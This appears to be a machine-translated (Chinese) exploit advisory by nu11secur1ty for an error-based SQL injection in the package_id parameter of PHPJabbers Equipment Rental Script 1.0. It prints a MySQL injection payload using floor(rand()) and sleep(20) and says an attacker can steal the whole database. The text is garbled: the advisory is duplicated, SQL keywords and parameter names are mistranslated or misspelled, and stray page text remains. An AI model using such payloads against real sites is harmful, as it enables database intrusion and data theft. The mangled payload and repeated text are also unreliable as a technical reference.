## title:设备租赁脚本1.0 -sqli
##作者: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectiondemo
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
Package_id参数似乎很容易受到SQL注入的影响
攻击。有效载荷'是在package_id参数中提交的,
返回数据库错误消息。您应该查看内容
错误消息以及应用程序对其他输入的处理,
确认是否存在漏洞。攻击者可以偷走
来自数据库的所有信息!
[+]有效载荷:
mysql
参数:#1*((自定义)帖子)
type:基于错误的
title: mysql或基于错误的- 何处或有子句(地板)
PAYLOLAL: PACKATD_ID=(-4488))或1组
concat(0x71787a6a71,(select(case(7794=7794),然后1 else 0 0
end),0x7176717671,地板(rand(0)*2))
min(0)#from(select(sleep(20)))a)cnt=2date_from=12/9/2023hour_from=11minute_from=00date_to=00date_to=12/9/9/2023hour_to=12minute_to=00
##复制:
系统管理员- 基础设施工程师
穿透测试工程师
主页page: https://www.nu11secur1ty.com/
##作者: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectiondemo
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
Package_id参数似乎很容易受到SQL注入的影响
攻击。有效载荷'是在package_id参数中提交的,
返回数据库错误消息。您应该查看内容
错误消息以及应用程序对其他输入的处理,
确认是否存在漏洞。攻击者可以偷走
来自数据库的所有信息!
[+]有效载荷:
mysql
参数:#1*((自定义)帖子)
type:基于错误的
title: mysql或基于错误的- 何处或有子句(地板)
PAYLOLAL: PACKATD_ID=(-4488))或1组
concat(0x71787a6a71,(select(case(7794=7794),然后1 else 0 0
end),0x7176717671,地板(rand(0)*2))
min(0)#from(select(sleep(20)))a)cnt=2date_from=12/9/2023hour_from=11minute_from=00date_to=00date_to=12/9/9/2023hour_to=12minute_to=00
##复制:
正在加载...
github.com
穿透测试工程师
主页page: https://www.nu11secur1ty.com/